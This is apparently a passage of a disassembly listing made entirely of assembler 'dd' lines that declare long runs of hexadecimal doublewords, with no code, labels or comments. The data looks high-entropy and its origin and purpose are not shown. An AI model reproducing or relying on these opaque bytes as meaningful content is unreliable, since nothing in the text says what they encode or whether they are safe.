		dd 0FA8D5606h, 116048D5h, 0AF4F650Ch, 8F760F08h, 0DBB37D68h
		dd 0EE166CCEh, 4329D36h, 0B0057707h, 0A9896F77h, 4D3E4C4Ah
		dd 64BB58BFh, 5F30568Dh, 0E7B8FA9h, 0BAF0A424h,	0B5C0DD3Ah
		dd 3C715AA7h, 13FCC2C4h, 320616E7h, 0E58B7D13h,	0FF3117FCh
		dd 0D5CFDC5Fh, 0BCAB8BD0h, 175285A4h, 0DFD8B635h, 2DF4C176h
		dd 0AF5F6096h, 7166DFB2h, 21ABDABFh, 3D96666Bh,	0F1B3E4EDh
		dd 0A1D68895h, 1AE50D7Eh, 0F6C2773Dh, 0F0844B10h, 0AB71C9C3h
		dd 7E8F9FCBh, 1CAC3B5Fh, 6F5E07C1h, 1529E654h, 5A8AD521h
		dd 13F37438h, 0B5546DA2h, 225276F5h, 970993EBh,	0A2ABD115h
		dd 0A4D21E5Fh, 0D787488Ch, 995E7251h, 0BCAD683Dh, 765D976Eh
		dd 742DD04Dh, 3A8546CFh, 51BC10BEh, 99C2037Bh, 20A33CDEh
		dd 3AA561E3h, 10690777h, 559F35F5h, 7765AE95h, 0F99E6322h
		dd 0C451D878h, 0A0FB5C0Dh, 6C4B2088h, 0D8E584C3h, 0B2567C10h
		dd 0E9F7BF45h, 38DB165Fh, 0DB18542Ah, 0A83DA897h, 8BD2FE08h
		dd 5D383977h, 0FB0990BCh, 0C0B70388h, 9FDF81F7h, 5B363D7Bh
		dd 6F5D8EE4h, 315AAA17h, 1BC5111Bh, 30C5507Ah, 7ACBDB24h
		dd 0A4FFF1B5h, 6A824AF9h, 67272E46h, 6C5CEFD1h,	0C05FB094h
		dd 0D1485FEFh, 9736F880h, 0FA25B607h, 0A67EE4D6h, 4585FE66h
		dd 78BADE9h, 45BB2722h,	3D306AE3h, 6AA26EA0h, 2B3EB17Fh
		dd 67CF21B4h, 3A6E6C66h, 94643879h, 0E858368Fh,	20E1FF5Bh
		dd 0AE5E39EFh, 8EB7C157h, 157221F8h, 23480008h,	71CC5487h
		dd 0CC04DAFCh, 0F836D66h, 9970156Ch, 0F43821CDh, 0E7CF0F60h
		dd 84F5278Dh, 0F6999118h, 0F546CBFEh, 0FEA8CCFBh, 0C5348912h
		dd 0B10C407Bh, 369BDE70h, 9F3010EFh, 0FE2E0B41h, 494E30FEh
		dd 8B75CDB5h, 68984DFCh, 52DE1AD5h, 0BE4AD55Bh,	1FF0CCBBh
		dd 0B1878F04h, 0FAF7DC31h, 55EB4F71h, 0F8B97E0h, 5D5AA768h
		dd 0AFE4B6DDh, 9F26C458h, 402C5128h, 2CAB4DDEh,	0BF4F5D40h
		dd 0F7EB488Fh, 799C03C7h, 0F9EC3B13h, 0C742F56Ah, 0E0C9B31Dh
		dd 8402AF1Ch, 0B377C57Ch, 23942F2Bh, 7DD4DF71h,	7B45DB28h
		dd 72D1EF95h, 3F7AB611h, 5CECD7F0h, 50CACFB7h, 2DF47BBBh
		dd 572A95A3h, 294282E0h, 0F176E616h, 0CBAFFA97h, 0B0BB076h
		dd 1A270785h, 0E271598Dh, 97CDD087h, 0C77C98F7h, 57BFDD75h
		dd 9F7EAFE6h, 65ECA533h, 50A80E4Eh, 44265666h, 0F12A71DBh
		dd 36ABA116h, 9807780Dh, 0C3A27871h, 44B17FDFh,	917F97F4h
		dd 0BC29B99Ch, 7B59C654h, 76D7F993h, 417EBA78h,	9F10450Fh
		dd 0F4C50F36h, 38A18417h, 16077258h, 88E27E4Fh,	0C6D59CA3h
		dd 72F6EFC8h, 0B52AF271h, 72B3828Fh, 0CE26A716h, 196961F2h
		dd 57D05367h, 0A5C0A24Fh, 0C521E76Ch, 70D62B79h, 0E835FEC9h
		dd 3713E49Ch, 7176BA12h, 0DCA5A16h, 0AFB44AD4h,	6BEBFE63h
		dd 57A27A4Eh, 0D01A33EFh, 0FB337C86h, 5CD1F07h,	0BF132BE5h
		dd 0BC9E0F1Ah, 2ED41383h, 0F286DC7Ch, 0D15CD6A6h, 0EB16120Ch
		dd 0EA8FFAFCh, 6321885Ah, 8439D491h, 0EAB7F808h, 0B41CE709h
		dd 0F6AC65E4h, 7C755AE4h, 109AC25Ah, 2CD7DCAh, 13FBB577h
		dd 3831BEB5h, 1C2AEEC5h, 0D6D645F8h, 0EB53C2D0h, 0AEA384DAh
		dd 2BA8C3B6h, 0E6694FB1h, 0AB71CE83h, 0E655164h, 0DA76B179h
		dd 0BFBFB0ACh, 555EFC17h, 685CC68Eh, 546B45A3h,	0CFEC0427h
		dd 6D106B21h, 0C8BEBD1Ah, 152075A4h, 143DC158h,	0F037FC34h
		dd 4DB71588h, 0DB1DF7A2h, 3EFE3E5Fh, 0F4211928h, 33382F4Ch
		dd 0FAF58284h, 6DCDF97Bh, 0C0282933h, 54A1B68Bh, 0C4BC9FAAh
		dd 8AA5DE44h, 0AAC7F9AEh, 0A1D6769Ch, 15FCA2C0h, 0CE4BCCE7h
		dd 631444DEh, 3C37F87Fh, 8DFEF46Bh, 0FEFC0FDFh,	2B60AF1h
		dd 6B060AA6h, 64E4BE67h, 16EA3DA3h, 3922E522h, 56E7B66Ah
		dd 0DE6FA2A7h, 86EF6EA9h, 979A77F3h, 0DA351843h, 732F2729h
		dd 0CFE57DB3h, 59DD15F5h, 5E3A9AEFh, 69429091h,	0B9E3BA95h
		dd 0AC1D41F1h, 5946C8Fh, 7F6FC88Ch, 0FBF4D4A5h,	5D79EDB5h
		dd 40D646A2h, 6A19B7CFh, 0B2191110h, 0C5A183A9h, 0A34DB375h
		dd 2E3CB283h, 0E42DC6B5h, 0B4342376h, 73193AF6h, 205F6362h
		dd 5F185BBBh, 9A41DC5h,	0EEA3D3B8h, 0E9A1A5FEh,	84ED06CBh
		dd 2ABF8ADh, 7DD7B417h,	0A3171ABCh, 415F3A37h, 82851B35h
		dd 0FD37C971h, 753F2BE1h, 15D04FB7h, 2978B820h,	499797C9h
		dd 238BBABDh, 0DB105F33h, 0E440F226h, 53688284h, 0B28B565Dh
		dd 819969E7h, 46368AEAh, 4A5178EFh, 26CC1F4h, 81E67A50h
		dd 575A6DAFh, 0B45EC1CFh, 5713F811h, 56E9E02Bh,	4399F94Eh
		dd 0D5F636F9h, 4B7EEBBCh, 21B4EB01h, 0E0F74AD9h, 60787C39h
		dd 0A1F5CCA9h, 1B89536Bh, 52A8DC77h, 3EA90B20h,	2ED6947Bh
		dd 0E078142Ch, 26AD06B3h, 4DDF5AAh, 2250C035h, 8FBE82C6h
		dd 7FE18D92h, 35B3D201h, 0F0E5CE5h, 884FB68Ch, 1F2AEF40h
		dd 0B139D773h, 3E459A49h, 6A8FFAFAh, 0BAF51BFAh, 9E4168E8h
		dd 570A4522h, 8EF7A9D8h, 4BB1C979h, 0AA254214h,	6CBAB22Eh
		dd 9B2454B4h, 2B2FFC56h, 61E0FB3Dh, 0E64AB7F4h,	69357816h
		dd 2E82A160h, 0A4D485FEh, 0A5A6C155h, 0FEE1EAC0h, 0DD2ABECCh
		dd 414D4378h, 0D8AAFDE5h, 0EDDEAAh, 7D365EAFh, 1AA47EA1h
		dd 2B596765h, 0C9EBDDD3h, 87E086AAh, 0B805CFB6h, 52B165ABh
		dd 0D514E37h, 0F9282B59h, 0E9ABCD2Ah, 506742CBh, 457F6B44h
		dd 0ACE13D54h, 9B78B4F0h, 0DCB7ACE0h, 4CA4D839h, 4AB50053h
		dd 0AE8A4EDFh, 51529990h, 526B3394h, 6BBFE1DEh,	4A39FDEBh
		dd 0D99B5F82h, 1B033375h, 7A3E0124h, 840AE1ECh,	0DF71380Bh
		dd 176B73D1h, 8E5EA07Ch, 0C4C7E204h, 848F830Fh,	7E2CF08h
		dd 27B19E67h, 320AB528h, 0AB4F744Ch, 3EF8B254h,	0C8A5F110h
		dd 0AFA3E6ECh, 8597EE3Eh, 5212ED94h, 431355E4h,	22BBD25Eh
		dd 3385E1A3h, 29CEB1C5h, 0C4535FD3h, 0C0F81C2Eh, 7F037DE8h
		dd 34ECF7BFh, 0C3875908h, 4267D199h, 132F228Bh,	53F0001Eh
		dd 91FD5236h, 8BFDCA84h
		dd 0B968C0B6h, 1BF6496Eh, 1E25A062h, 72DD92Ah, 7200A8C7h
		dd 3650CAC8h, 2635D6EBh, 0AB9C106Eh, 5A83CCFAh,	0A3C5AC88h
		dd 0DB2AFBFDh, 528B2257h, 5EBB9CE6h, 0A9DC5E6Bh, 991F03D3h
		dd 85F373FAh, 0C7653DE5h, 0DB370A8Bh, 2A6CD256h, 3F115252h
		dd 2F534E1Ch, 0E61D4EFAh, 9E9C2FEFh, 2E3581E0h,	0AA2545DFh
		dd 0C86F3B72h, 0EC522CFCh, 0BC742A99h, 6181AD01h, 29DBA76Dh
		dd 73DFFB6Bh, 0BE6E5861h, 0FE4CA9FFh, 33FEE54Eh, 42E5FB35h
		dd 0B95DBBAEh, 3F5A216Dh, 0A97AD51Dh, 2CED85BAh, 3B0DB03Eh
		dd 0E86B272Bh, 0AF045E6Bh, 7D5A3F5Ch, 6DC5245Ch, 0D7D4056Ch
		dd 2F7EFB9Bh, 0ECB1CBC6h, 364E3A1Bh, 9989208Ah,	2FB2E4C9h
		dd 0FE7710D2h, 0E044CC0h, 28CF0E45h, 68FDA145h,	0EAD4B3E9h
		dd 0FDFFC99h, 62FCFC34h, 0C1F10FC7h, 7AF3C051h,	0D41DBBCCh
		dd 68A4CFE1h, 31DE28ADh, 0ABAE5B03h, 4918198h, 0A50F163Ah
		dd 0E4BE6CF1h, 0C0E32672h, 0BA4E9D22h, 2660881h, 9566ED3Eh
		dd 0A3C3A9DDh, 0F361F98Bh, 54E590E0h, 286486B1h, 79EBD812h
		dd 0AA462691h, 1F74F086h, 0D39FB878h, 839A3A15h, 61F93374h
		dd 2B0BE77Ah, 0E5CA0B4Dh, 0EFA2CB55h, 0CFB7060h, 0CD4BBFA6h
		dd 313A95C7h, 35B3855Ah, 0E05F964Ah, 5D83D581h,	82B5E1FCh
		dd 37EFAA09h, 0F5285EC3h, 9268C465h, 0AF6C0B54h, 470A891Ch
		dd 0F3CF5DBBh, 0A61EE52Eh, 0A3334BFEh, 0BAB79B27h, 0ABBDBF80h
		dd 27B4ACE0h, 30E04E48h, 7BF1496Eh, 0F9A15B2h, 0B729719Ch
		dd 75A4FBBEh, 9AFFC539h, 1FE8425Fh, 0C531078Bh,	429DF1DDh
		dd 5E63C9C5h, 0B36D60EBh, 695A0E92h, 0FF39FDFBh, 0C63A6C41h
		dd 2111189Bh, 6AAC9667h, 0F6CA510Ch, 0AA362950h, 5277FCF1h
		dd 3188EBEh, 0ADC8365Ch, 7427C306h, 4CEF5A69h, 0C3BA7B0Fh
		dd 10A581E1h, 6679D3F1h, 9060F26h, 0C3C087B1h, 0F7180FD1h
		dd 0D4C14075h, 0AB2DEEF9h, 0A4AD532Eh, 1C324F22h, 3BBCAD12h
		dd 0ECF39F54h, 0F056709h, 651551B0h, 0BA6B9BE5h, 6482CB4Fh
		dd 4EBFED77h, 0E6FB3AF9h, 0EA52D44Eh, 951E1109h, 0D6AB1948h
		dd 2D195F67h, 0C427B477h, 0D872A5DEh, 4303BF5Ch, 28E10326h
		dd 89A4BDFAh, 0F6792633h, 4809D90Ah, 50D94512h,	0C4FCD4D0h
		dd 629A62FDh, 556EABECh, 551AB698h, 46B6D8FAh, 625E8750h
		dd 4717AE2Ch, 7C7A48D5h, 538ECDB4h, 0B36302A7h,	0D008B71Ch
		dd 0D39F8547h, 9DF71E1Fh, 9689D2ABh, 2523D5B3h,	56AAD5BAh
		dd 48DE54EFh, 78395B77h, 4716FC1Fh, 7AB1D87h, 7E3C5B95h
		dd 313282AFh, 0C09BFD61h, 0DF5EFC3Ch, 954499EAh, 7311156Dh
		dd 3E0A495h, 0D9C20D86h, 9160AF0Bh, 3B3DEDEAh, 34087DFFh
		dd 9944CF3h, 0E6A33138h, 84E6CF75h, 0BE3D1BE8h,	83B37A2Ch
		dd 0F1E2EB97h, 0E5B347E0h, 63AB06BCh, 966EB298h, 3F2D5630h
		dd 0FEF9A2F8h, 2BED9D3Dh, 0EBCDC69Ah, 5E5B9D17h, 4D2A50Fh
		dd 0AA42B94Bh, 7B45E3CCh, 0D5867130h, 0ECCEA8Ah, 0A117A4E2h
		dd 5B5F55D4h, 0DAD74C6Fh, 12B468D0h, 0CAAD86C9h, 0F434BFC1h
		dd 1CC8A2C0h, 0B12EBF4Ah, 0EB670B6Bh, 9CC71AA9h, 0C1585807h
		dd 16973765h, 5296F0D2h, 6D0AA280h, 0DE72D9F3h,	0E118822Bh
		dd 0BBACB35Dh, 0E317116Ch, 0A5AD1488h, 0C5045645h, 0D2A75FC8h
		dd 66D67C9Fh, 0ADA98B54h, 0BAD02B7h, 28766555h,	961FFDFCh
		dd 5DC04DBDh, 0C3CE8DC8h, 0E3488207h, 35043370h, 0FF7DA7F7h
		dd 0AD624616h, 0C5D18E84h, 9FAA795Eh, 1DE17E9Bh, 0DC18BC1Ch
		dd 0BBA7A241h, 0F4D6D2FDh, 0F9A8CEAAh, 54CC030Ah, 82F29E22h
		dd 66DB5AEFh, 51CF12Ah,	0C7216C54h, 0BEEB6C1Ch,	154FD84Ah
		dd 6D951118h, 17E9CD38h, 8B572D71h, 11A0C4AFh, 297532A5h
		dd 4AE95CC1h, 41E46F14h, 53C53BB4h, 0F2B38F32h,	0A51CAEC0h
		dd 0A17B3FBCh, 870BBFAAh, 0D19DFF01h, 35A9BB8Bh, 0D1B65E0Dh
		dd 0BD6677C9h, 0E3F9F0AAh, 0DE92B30Bh, 89F03014h, 0D680C323h
		dd 7105532h, 8DC27994h,	0F5334C37h, 0BF50A572h,	1C937835h
		dd 4535E0D8h, 266A708Dh, 0F6675E74h, 95537BBAh,	0B06574FFh
		dd 5506768Bh, 0A7B49CD4h, 2B47489Ah, 77EA25A2h,	0DAE67F95h
		dd 21595830h, 0CC009F27h, 0A4B8F698h, 0B5E40D7Eh, 0DB7CB5E8h
		dd 0D1C46651h, 0AA00CFCBh, 356AF46Dh, 8FAFA8BBh, 5EBDF2BCh
		dd 7768ABE1h, 796336F0h, 0C3D9359Ch, 0C80A6239h, 12BFC87Dh
		dd 9EAC592Bh, 6A33DE1Fh, 21B4D4A0h, 0AD855353h,	0C6DB76A2h
		dd 0D52A1521h, 0E8854F95h, 0DFCEBC48h, 186EB70Fh, 5663EFE8h
		dd 668AEC68h, 0B103F125h, 81653AE5h, 0B46FA2C3h, 7AC20156h
		dd 83256976h, 19A8501Ch, 78AB52C5h, 0F3FCDA28h,	16ED261Dh
		dd 10F44743h, 0BEC59B77h, 9398CEF2h, 0F1213496h, 0F257C26Eh
		dd 0D8C055D3h, 0FE6C4EDh, 0D6560F3Fh, 6B52AEB1h, 0F854CD53h
		dd 0DA4729A2h, 0B6E2DC18h, 4A45D661h, 8D829656h, 531E5FE1h
		dd 0B51F91Ch, 17E8939Bh, 303E6EB0h, 2BEB622Dh, 99225764h
		dd 0DDFEE8FAh, 0BF8675BEh, 0B7C14D79h, 0AF258659h, 3DF485E2h
		dd 1DCCC5E8h, 0A48F384Bh, 0E5C7B184h, 0D43FAFC1h, 0F7FF87E5h
		dd 0D2BB9CDCh, 2377CB5h, 0DB796204h, 7B11416Ch,	0E61B8AE0h
		dd 0DACEDA77h, 1E009D31h, 7CA5582Eh, 80D3759Ah,	0AEB57D53h
		dd 3769C9FDh, 1F1C5AB0h, 1B7A3AB8h, 3011B30Fh, 6D540E48h
		dd 5D96A773h, 260F9BCCh, 7DAB0934h, 7BDD81FCh, 0FDC07A1Fh
		dd 53176B9Eh, 2952C8DCh, 0DD905584h, 0CC94FCCh,	6A228502h
		dd 8EB30339h, 0D7C9DA73h, 0A77A2D8Ch, 0B296ADCBh, 204A0773h
		dd 67C88C33h, 0DBFCBD97h, 1875EA5Dh, 90AD03B4h,	5F6ABB3Ah
		dd 0EE75AC54h, 69BE6E12h, 7C54303Fh, 5C36F6B3h,	8983445Dh
		dd 0F93E828Bh, 59E6030Ah, 37CE14A4h, 936AC225h,	0FEFEFBD5h
		dd 70FCEAF3h, 66EAFB2Ah, 0DEAD35D3h, 0A0AB5D19h, 0BA73C103h
		dd 38B5BD2Ch, 0E5E575DAh, 55B64ED1h, 0B5771BEh,	0F1DB6898h
		dd 9156DD76h, 0F5EF0938h, 7FC295A9h, 8A2AD15Bh,	56FA3A3Fh
		dd 0F5A3A5C2h, 0A8FED83Dh, 0DFA533D1h, 9CFC1695h, 90A05E7h
		dd 0E0E70E11h, 56CE5C76h, 0E07CA2BDh, 68CAB470h, 69C288C5h
		dd 75E2FC2Eh, 5B243725h, 0F4F31F42h, 588261E2h,	82ED249Fh
		dd 0D1D7DFEEh, 1A4D0BA3h, 97F912C4h, 7BDE21C3h,	5431773Fh
		dd 56757818h, 0D7CE3769h, 4212784Ch, 7E6E6F0Dh,	0E0AF58D7h
		dd 0DDE6275Eh, 44955E3Ah, 982A46D3h, 0A93EC133h, 46B6E2E1h
		dd 0B53D5CBBh, 7CEF3AA7h, 97480EBEh, 0CD5ED5B5h, 0BFBFEA3Fh
		dd 9B143434h, 99EC0FBAh, 9D298352h, 0AAF06F2Fh,	88D20BDDh
		dd 4F11D674h, 8F039E57h, 46F3EDCDh, 6294D1A3h, 10CE4BB5h
		dd 8CED6277h, 47810613h, 8B6E2DCCh, 0AE6D1155h,	0BFD52B6Bh
		dd 0C0A49C78h, 712AD8F1h, 0F6C49381h, 7C3933A0h, 3C85CA0h
		dd 0EA119F07h, 5778F544h, 0B4E05751h, 0EEF9B64Bh, 0A7D99F5h
		dd 557262FEh, 42DE3A2Ah, 4A37E463h, 8CF7F3E4h, 0D873565Ch
		dd 0E7CF9BF8h, 0FB060F5Fh, 6FC352A3h, 0A3D55B27h, 0ACDFF785h
		dd 0EA29CA42h, 456B10FFh, 6AC2F072h, 8665ED10h,	0A31FC9E4h
		dd 5266703Eh, 0E91E78B7h, 0E9B3E8CBh, 0BABBE17Eh, 0F6FB2692h
		dd 555CD5E4h, 0ED9C207Dh, 1C1E4586h, 252B96Ah, 0A0DF3C73h
		dd 0DAB47FA7h, 68D6577Ch, 15F16A1h, 0ECFC2BC2h,	0D8CEE821h
		dd 0F60CFC1Fh, 7C01509Ch, 72AAF2B7h, 7976FED4h,	3F3A1555h
		dd 78479FECh, 1C4F07FBh, 2F425999h, 88A52368h, 40550C6Ch
		dd 0E098960Bh, 0BF8C280Dh
		dd 9A23C3F1h, 0B96FDB34h, 0A53D104Bh, 0BF13C0FDh, 5ABFDD1Ch
		dd 0A5851A03h, 0CFF76D4Eh, 7DC67360h, 0EFAAC13Fh, 355B5018h
		dd 5F8D364Ah, 0F962B478h, 88180DE5h, 37D362EFh,	4C3D8D62h
		dd 1128C5A8h, 13ED24Bh,	7AAC343Fh, 0AD993A2Ch, 5952B7DFh
		dd 7BFD99F4h, 0C8286037h, 0FAAC3B31h, 0F5C026F4h, 0EE9D8D29h
		dd 506D7B38h, 11A53BC1h, 2A746757h, 955470EAh, 0DF5A2158h
		dd 0E097246Ah, 6FBAC5EAh, 3AE38471h, 514EEC0Fh,	6CAA9CB9h
		dd 5ED4F1A3h, 6ABC2932h, 0B0ED4E66h, 5411B492h,	0E695D0FEh
		dd 0D3DAAFD3h, 29C9053Fh, 0A82DE231h, 37F69AF2h, 0ECD62D14h
		dd 0EE2141DFh, 135E0D10h, 0E813C115h, 0B9E80007h, 1B633A23h
		dd 0EE8F3DF3h, 1878798Ah, 1892684Ch, 1303A7D5h,	61ACFADCh
		dd 0FFBEE3D3h, 0C98C3022h, 42D7C723h, 0FCB06A62h, 2BF21669h
		dd 59A93695h, 0E5F7F442h, 4DC7AC6Fh, 3018E860h,	0A898AD15h
		dd 7F87F056h, 695D5F51h, 0E925E799h, 0DF4CB5A9h, 259FE6E7h
		dd 7B5E769Eh, 1F2D1C6Eh, 65500F9Ch, 6D124F4Dh, 0B331B856h
		dd 7C36DAE3h, 383EAF0Dh, 0F067584h, 53083DCh, 0E6660F50h
		dd 22C1FC0Dh, 1056AB80h, 0D26AF956h, 81114A8Ch,	0DB6DF084h
		dd 778C44CEh, 76E807E8h, 0BDB61D6Dh, 74F6A493h,	0D19283B2h
		dd 9C73E977h, 9ADFCBCh,	0D32242BAh, 0E6063CDDh,	2E09945Fh
		dd 0A6FDC060h, 42AE5FF1h, 4DB48E15h, 0A2F4C34Ah, 4E2B7662h
		dd 0C9A929ABh, 380F9B69h, 0D5B8540Eh, 9ED24827h, 666F61C0h
		dd 0B828D81Bh, 2C953FAEh, 0F8504B41h, 0B9F08FD1h, 6E4BE057h
		dd 0B9955F33h, 38E54D17h, 613B6679h, 0BDC348EFh, 7E329D2Ah
		dd 167B0C54h, 0BB2B058Dh, 6A4FE473h, 45AFA873h,	0DFC1FDF7h
		dd 44A557EBh, 7E2326F9h, 666979B8h, 1CC56B1Ch, 8515839Ch
		dd 0B786D620h, 6D29B944h, 283EE0D8h, 85B10AA3h,	8D83683Fh
		dd 74A629CFh, 0B42504BBh, 0AD532535h, 0E0EB7523h, 3BBD9F73h
		dd 0D7F49BE3h, 3294ACD1h, 96A5FF7h, 0FEFCF87Ah,	9251E085h
		dd 0D7DFB96Dh, 0AC5D33E3h, 7073094Ch, 0C7F28AFDh, 1AABD3B9h
		dd 4DC4CE96h, 491EACE2h, 66DFA1D7h, 195703EFh, 3F19135Ch
		dd 4286AFCh, 71DDD655h,	0E5BE4A66h, 0D78FE594h,	0B4858AC2h
		dd 0C856B7D7h, 940AFA36h, 0FC278CE4h, 22095F3Dh, 2AD6B484h
		dd 72613D93h, 453946D0h, 0AAE3F8BAh, 0E3A3A338h, 0AC967901h
		dd 0ADB5B68Fh, 28A489ABh, 0F55FB03Ch, 80BECE7Dh, 6C95180Dh
		dd 0A6212818h, 40995A62h, 0ED3F3298h, 0E3F9FABAh, 5B8A412Dh
		dd 17315FEEh, 6C6A38DAh, 328C6D48h, 0DCE6C952h,	0EDF2A62Bh
		dd 7FB89036h, 85C1856Fh, 0B0FA7EFAh, 0DDAFC9F0h, 0DBAAC6F5h
		dd 691C6DC0h, 8674F8C3h, 0BAF1ACC2h, 94D2BF45h,	8896F57Dh
		dd 0AD2BF97h, 87C85EF0h, 0C5A48954h, 0E343BEB1h, 9BCF9465h
		dd 87A37D1Dh, 0E8543C4Bh, 2571DF33h, 0E700383Ch, 0C0FCDB7Eh
		dd 39654110h, 0AEB0AEF7h, 0E7CF2216h, 2A1C0655h, 20CE507Fh
		dd 4499C8F3h, 0C5FEE629h, 4C5CAAEh, 8677BCE5h, 3C616FCEh
		dd 52BD7585h, 41D253EFh, 38D4AD03h, 55ADF9D2h, 0CB3F54EBh
		dd 59B51095h, 4075F7E0h, 0AF927F15h, 139188D8h,	41FDB470h
		dd 0DE231EF0h, 0A78AB62Ch, 0D8BCA52Bh, 7CD7C6Dh, 8936C5DEh
		dd 2A4033C1h, 0C34E94AFh, 88F5C0C5h, 0D90AAD17h, 81EC82C2h
		dd 3BD4E52Ah, 18640BF2h, 3718D877h, 9C4D0A5Eh, 0E75AB1B2h
		dd 99BE738h, 3610A69Fh,	0F5AEE6DFh, 73895799h, 0CF84A2B9h
		dd 0FEC4B2Dh, 5C7572D1h, 0B133F957h, 7F2D86ABh,	530372F7h
		dd 37555457h, 8999C55Ah, 0FD67E596h, 98DCB1E2h,	0F0F06B53h
		dd 0DD225F03h, 94C5E9B9h, 612BFF83h, 8EEDF783h,	0DD65473h
		dd 5E1F0A47h, 6D953798h, 129F81BCh, 79E2F0B5h, 0EDDFF6CEh
		dd 0A1469DEBh, 968A38EBh, 4E527BFAh, 8BF17419h,	725553E1h
		dd 0B8B00C75h, 48DA2C1Bh, 0AFAD35D0h, 8D94A398h, 0AC33BDA8h
		dd 12D9D0BBh, 6AF85EFFh, 8845B636h, 9039E626h, 0C594198Ah
		dd 3DECB607h, 52BFBEC1h, 0E343B426h, 605547DBh,	8754BF6Ah
		dd 0CEE63B46h, 4DDECB16h, 0E3C15543h, 6494F32Bh, 6ED531D6h
		dd 0CED7B9B4h, 0FB6768F6h, 0F1CFBAACh, 9AA4CC91h, 0DD3FE2AAh
		dd 163CEB43h, 0DB6A94F0h, 6BEF9C97h, 0CDD1D765h, 3F184512h
		dd 20030E50h, 3B4C3E44h, 714D220Fh, 968A4D09h, 58A275B8h
		dd 0A70DFCA1h, 6A569B9Dh, 0EB9B5DEFh, 0FFF1F8D6h, 33892D6Ch
		dd 313AC76Ah, 0AA03377Bh, 0ADDF3D0Dh, 4529A502h, 0CCA993B6h
		dd 49EB761Ah, 0FC2B0CEDh, 1F8EB5C8h, 0D9149252h, 0A0F88355h
		dd 50E0C0C8h, 0A1AEBCEh, 19AAF9E1h, 90EF866Bh, 9DB8ADFh
		dd 0AC0C1D90h, 3F93FB2Fh, 73576C69h, 0E84BAE8Bh, 0FBEB5685h
		dd 5838FA2Eh, 7CBC8D88h, 0D35595AFh, 0E3C22362h, 80954ACh
		dd 0DC7A175h, 15775AB8h, 308B0E17h, 0EDD3E449h,	0FC50846Ch
		dd 87786B4Bh, 0A508FC3Ch, 0BEB42C8Eh, 4649E474h, 85C3B868h
		dd 645A575h, 588BC33Ah,	0B789F437h, 0D4AE1CC7h,	0D23AEC39h
		dd 489A9975h, 0CC6DCABBh, 0D2832F86h, 647EDC99h, 39FC705Fh
		dd 7382610h, 607CD43Fh,	4757717Ah, 0A689340Dh, 73960C0Dh
		dd 186F685Dh, 51FF2BBDh, 0DE75FAD6h, 53E49EB9h,	9896E93Ah
		dd 0D1AA2F4Ah, 2D210592h, 477F1159h, 20DBDFA1h,	0B43170BEh
		dd 6F3098DDh, 0BF62135Dh, 61D85FE4h, 655C8D8Dh,	0CE67A2D1h
		dd 0B75C79D2h, 4FC067F8h, 2F0B8687h, 7DE491FDh,	8F6FCDBDh
		dd 7FB4B566h, 0A1B9A153h, 8A87AD43h, 60D8B9E8h,	76062D72h
		dd 80F4A7Bh, 0C0299826h, 0F7B57F96h, 11F1D75Ch,	16F6A9EEh
		dd 0C772F95Ah, 50309F07h, 5D307F7Eh, 590C69E9h,	0B6693FA3h
		dd 5A26C4D9h, 3643C35Fh, 7A97DF7Bh, 0BE5A759Eh,	62EE5E99h
		dd 79E73048h, 0BFBAA455h, 0FB156568h, 7C0F8DA3h, 39DCABAEh
		dd 0DCAC8DBFh, 81065E75h, 8C5FCF07h, 0ED7B6A91h, 7618AEE4h
		dd 4A7CFB6Ch, 0DB71FCCh, 0A9C94668h, 780CFB93h,	305F6747h
		dd 4491C671h, 89D0C39Bh, 32EE73E8h, 0A0A77EE3h,	39B72531h
		dd 0FC4F1F6h, 845F5ABFh, 93197AA0h, 83E17AF7h, 312B455Bh
		dd 783C7D20h, 1BAF970Ch, 0F8E2535Dh, 0FC918BD4h, 24F3B1Eh
		dd 838E7F4Eh, 68908F83h, 0B015A687h, 4A2BD0BCh,	280F02B4h
		dd 2FAEBCE9h, 396830D9h, 2F5BC543h, 759ECC3Bh, 58CB0FFDh
		dd 181F5952h, 0FAE95FADh, 575AAD1Bh, 26D16E8Bh,	50ED5E5Bh
		dd 0C85DFD22h, 323E32E6h, 0D4C3648Bh, 57CCF6BFh, 34EC4D2Eh
		dd 5253F405h, 4B64B32Ah, 38CACFB4h, 51859CDFh, 0C3ADEC25h
		dd 54ED0674h, 93C96986h, 45C511A3h, 0B2BEAD6Dh,	0BCF53039h
		dd 0F8588DF1h, 66D18974h, 0FF244B88h, 90B1610Bh, 2673055Eh
		dd 0C5EDDDD6h, 9438C1F7h, 0AD5611C9h, 7AE5F16Ch, 1DD6D77Dh
		dd 0ADE6286Fh, 47581623h, 948ABF6h, 6E6CBF7Ah, 0DD7FBE3Dh
		dd 0ED1FB55Bh, 188612EEh, 6917B0Ch, 0EA4BE099h,	5AD1CEDAh
		dd 1B7CAE2Dh, 0FFA78EC8h, 3CED5ADFh, 0E46F1CE0h, 0FE5A8E3Ah
		dd 0D347E254h, 0A95FA1BEh, 344B7171h, 5D760ADh,	38F2B9B2h
		dd 0D4240970h, 538320ADh, 6266CACAh, 303CEA87h,	62D46DA1h
		dd 4DCAFA2Dh, 9975818h,	0AA7F2D14h, 3F05CBAEh, 0AC99C824h
		dd 9CFF2EE7h, 4F6A4D36h, 0A33A2CF1h, 0C303BCEDh, 0C58E499Fh
		dd 9047C83Bh, 0D616DAD9h, 9A0A95CEh, 0B0D9D071h, 68FD6AFFh
		dd 35F71AB1h, 526FDD60h, 0ED34108h, 0CEF48453h,	0C8DB5861h
		dd 0A8CC4609h, 0EE142B2Dh
		dd 5EAACA9h, 6AEDFB9Fh,	6503BB8Bh, 0C3E349F6h, 563AB631h
		dd 0C21E408Ch, 0C9E3F51Ch, 0BB652D1h, 0EA0FAB8Fh, 3CAB6647h
		dd 8BE1BFF6h, 0CF9431D0h, 737E3C82h, 0B26A8126h, 8B45AADFh
		dd 0B529AB41h, 0A0065288h, 35F620CDh, 0EBF722CBh, 0C195BA1Bh
		dd 14D33D41h, 5DF3F53Bh, 27AEE390h, 0FBFD2F4Ch,	542DA99Eh
		dd 15BEB3FCh, 0C4E61759h, 0DCDB14D7h, 4A806595h, 0F5D523EAh
		dd 4A4429Eh, 4B940E06h,	477B6BE9h, 48F9854Dh, 3C7F13EDh
		dd 0CCCCCCACh, 0B4276894h, 0C139557Ch, 4E1FCBDFh, 10FC5375h
		dd 4CE16270h, 49545749h, 1A216897h, 0EAD933B6h,	0DB025239h
		dd 5B677CD7h, 0F87F410Ch, 0C5A10093h, 0DB706675h, 0A7C93E2Dh
		dd 1AAF4F31h, 0EB5F55EDh, 0DB5D36DAh, 2F581A48h, 0CD9F4DE4h
		dd 8844552Eh, 50971715h, 97245550h, 0F27C0554h,	734173F6h
